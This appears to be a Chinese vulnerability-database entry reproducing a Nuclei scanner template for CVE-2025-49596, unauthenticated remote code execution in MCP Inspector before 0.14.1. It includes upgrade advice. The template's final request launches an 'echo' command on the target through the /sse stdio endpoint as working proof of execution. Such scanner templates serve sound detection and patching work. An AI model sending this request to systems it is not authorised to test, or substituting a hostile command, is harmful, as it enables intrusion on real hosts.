CVE-2025-49596: MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution

日期: 2025-08-01 | 影响软件: MCP Inspector | POC: 已公开

漏洞描述

The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.

PoC代码[已公开]

id: CVE-2025-49596

info:
  name: MCP Inspector < 0.14.0 UnauthenticatedRemote Code Execution
  author: ye11oc4t
  severity: critical
  description: |
    The MCP inspector is a developer tool for testing and debugging MCP servers. Versions of MCP Inspector below 0.14.1 are vulnerable to remote code execution due to lack of authentication between the Inspector client and proxy, allowing unauthenticated requests to launch MCP commands over stdio.
  remediation: Users should immediately upgrade to version 0.14.1 or later to address these vulnerabilities.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-49596
    - https://github.com/modelcontextprotocol/inspector
    - https://github.com/modelcontextprotocol/inspector/commit/50df0e1ec488f3983740b4d28d2a968f12eb8979
    - https://github.com/modelcontextprotocol/inspector/security/advisories/GHSA-7f8r-222p-6f5g
    - https://www.oligo.security/blog/critical-rce-vulnerability-in-anthropic-mcp-inspector-cve-2025-49596
  classification:
    epss-score: 0.04801
    epss-percentile: 0.89072
  metadata:
    verified: true
    fofa-query: title="MCP Inspector"
  tags: cve,cve2025,mcp,anthropic,unauth

flow: http(1) && http(2) && http(3)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    host-redirects: true
    max-redirects: 2
    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body,"MCP Inspector")
        condition: and
        internal: true

    extractors:
      - type: regex
        name: js
        group: 1
        part: body
        regex:
          - 'src="([^"]+\.js)"'
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}{{js}}"

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - compare_versions(version, '< 0.14.0')
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        internal: true
        group: 1
        part: body
        regex:
          - 'const\s+version\s*=\s*"([0-9]+\.[0-9]+\.[0-9]+)'

  - method: GET
    path:
      - "{{BaseURL}}/sse?transportType=stdio&command=echo&args[]=hello-from-brower"

    matchers:
      - type: dsl
        dsl:
          - contains_all(body,"endpoint","/message?sessionId=")
          - status_code == 200
        condition: and

    extractors:
      - type: regex
        name: session_id
        part: body
        group: 1
        regex:

          - '\/message\?sessionId=([a-z0-9-]+)' # Returns: Session ID as proof of execution
# digest: 4a0a00473045022061d827994af3712dc246222bf91fb0af200d1e19f3e809fc89806166f0c39476022100a479ba719c915983768cee68d74f2e59635853610dc45f32c1be16b6c0451192:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2025/CVE-2025-49596.yaml

相关漏洞推荐